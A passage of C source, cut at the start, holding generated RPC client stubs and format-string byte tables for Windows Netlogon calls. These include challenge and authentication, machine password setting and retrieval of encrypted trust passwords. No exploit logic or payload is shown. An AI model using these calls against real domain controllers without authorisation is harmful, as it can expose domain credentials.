return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[222], TrustedDcName, AccountName, SecureChannelType, ComputerName, Authenticator, ReturnAuthenticator, EncryptedNewOwfPassword, EncryptedOldOwfPassword).Simple;
}
static const netlogon_MIDL_PROC_FORMAT_STRING netlogon__MIDL_ProcFormatString = {0, {
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x28, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x3c, 0x00, 0x44, 0x00, 0x46, 0x05, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x10, 0x00, 0x14, 0x00, 0x12, 0x21, 0x18, 0x00, 0x14, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48,
0x00, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x40, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x5e, 0x00, 0x60, 0x00, 0x46, 0x08, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00,
0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x08, 0x00, 0x48, 0x00, 0x10, 0x00, 0x0d, 0x00, 0x0b, 0x01, 0x18, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x20, 0x00, 0x14, 0x00, 0x12, 0x21, 0x28, 0x00,
0x14, 0x00, 0x58, 0x01, 0x30, 0x00, 0x08, 0x00, 0x70, 0x00, 0x38, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x1e, 0x00, 0x40, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x8e, 0x02,
0x58, 0x00, 0x46, 0x08, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x08, 0x00, 0x48, 0x00, 0x10, 0x00, 0x0d, 0x00,
0x0b, 0x01, 0x18, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x20, 0x00, 0x2a, 0x00, 0x12, 0x41, 0x28, 0x00, 0x2a, 0x00, 0x0a, 0x01, 0x30, 0x00, 0x42, 0x00, 0x70, 0x00, 0x38, 0x00, 0x08, 0x00, 0x00, 0x48,
0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x48, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x56, 0x00, 0x40, 0x01, 0x46, 0x09, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00,
0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x08, 0x00, 0x48, 0x00, 0x10, 0x00, 0x0d, 0x00, 0x0b, 0x01, 0x18, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x20, 0x00, 0x2a, 0x00, 0x12, 0x41, 0x28, 0x00,
0x2a, 0x00, 0x12, 0x41, 0x30, 0x00, 0x5a, 0x00, 0x12, 0x41, 0x38, 0x00, 0x5a, 0x00, 0x70, 0x00, 0x40, 0x00, 0x08, 0x00, 0x00,
}};
#elif defined(_M_IX86)
#pragma optimize("", off)
NTSTATUS NetrServerReqChallenge(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientChallenge, OUT PNETLOGON_CREDENTIAL ServerChallenge)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[0], (unsigned char *) &PrimaryName).Simple;
}
NTSTATUS NetrServerAuthenticate2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientCredential, OUT PNETLOGON_CREDENTIAL ServerCredential, IN OUT ULONG *NegotiateFlags)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[60], (unsigned char *) &PrimaryName).Simple;
}
NTSTATUS NetrServerPasswordSet2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, IN PNL_TRUST_PASSWORD ClearNewPassword)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[138], (unsigned char *) &PrimaryName).Simple;
}
NTSTATUS NetrServerTrustPasswordsGet(IN LOGONSRV_HANDLE TrustedDcName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedNewOwfPassword, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedOldOwfPassword)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[216], (unsigned char *) &TrustedDcName).Simple;
}
#pragma optimize("", on)
static const netlogon_MIDL_PROC_FORMAT_STRING netlogon__MIDL_ProcFormatString = {0, {
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x14, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x3c, 0x00, 0x44, 0x00, 0x46, 0x05, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00,
0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x04, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x08, 0x00, 0x14, 0x00, 0x12, 0x21, 0x0c, 0x00, 0x14, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00,
0x00, 0x00, 0x0f, 0x00, 0x20, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x5e, 0x00, 0x60, 0x00, 0x46, 0x08, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00,
0x0b, 0x01, 0x04, 0x00, 0x08, 0x00, 0x48, 0x00, 0x08, 0x00, 0x0d, 0x00, 0x0b, 0x01, 0x0c, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x10, 0x00, 0x14, 0x00, 0x12, 0x21, 0x14, 0x00, 0x14, 0x00, 0x58, 0x01,
0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x1c, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x1e, 0x00, 0x20, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x8e, 0x02, 0x58, 0x00, 0x46, 0x08,
0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x04, 0x00, 0x08, 0x00, 0x48, 0x00, 0x08, 0x00, 0x0d, 0x00, 0x0b, 0x01, 0x0c, 0x00, 0x08, 0x00,
0x0a, 0x01, 0x10, 0x00, 0x2a, 0x00, 0x12, 0x41, 0x14, 0x00, 0x2a, 0x00, 0x0a, 0x01, 0x18, 0x00, 0x42, 0x00, 0x70, 0x00, 0x1c, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00,
0x24, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x56, 0x00, 0x40, 0x01, 0x46, 0x09, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x04, 0x00,
0x08, 0x00, 0x48, 0x00, 0x08, 0x00, 0x0d, 0x00, 0x0b, 0x01, 0x0c, 0x00, 0x08, 0x00, 0x0a, 0x01, 0x10, 0x00, 0x2a, 0x00, 0x12, 0x41, 0x14, 0x00, 0x2a, 0x00, 0x12, 0x41, 0x18, 0x00, 0x5a, 0x00,
0x12, 0x41, 0x1c, 0x00, 0x5a, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00,
}};
#endif
static const netlogon_MIDL_TYPE_FORMAT_STRING netlogon__MIDL_TypeFormatString = {0, {
0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x00, 0x08, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x02, 0x5b, 0x15, 0x00, 0x08, 0x00, 0x4c, 0x00, 0xf4, 0xff, 0x5c, 0x5b, 0x11, 0x04,
0xf4, 0xff, 0x11, 0x08, 0x08, 0x5c, 0x11, 0x00, 0x02, 0x00, 0x15, 0x03, 0x0c, 0x00, 0x4c, 0x00, 0xe4, 0xff, 0x08, 0x5b, 0x11, 0x04, 0xf4, 0xff, 0x11, 0x00, 0x08, 0x00, 0x1d, 0x01, 0x00, 0x02,
0x05, 0x5b, 0x15, 0x03, 0x04, 0x02, 0x4c, 0x00, 0xf4, 0xff, 0x08, 0x5b, 0x11, 0x04, 0x0c, 0x00, 0x1d, 0x00, 0x10, 0x00, 0x4c, 0x00, 0xbe, 0xff, 0x5c, 0x5b, 0x15, 0x00, 0x10, 0x00, 0x4c, 0x00,
0xf0, 0xff, 0x5c, 0x5b, 0x00,
}};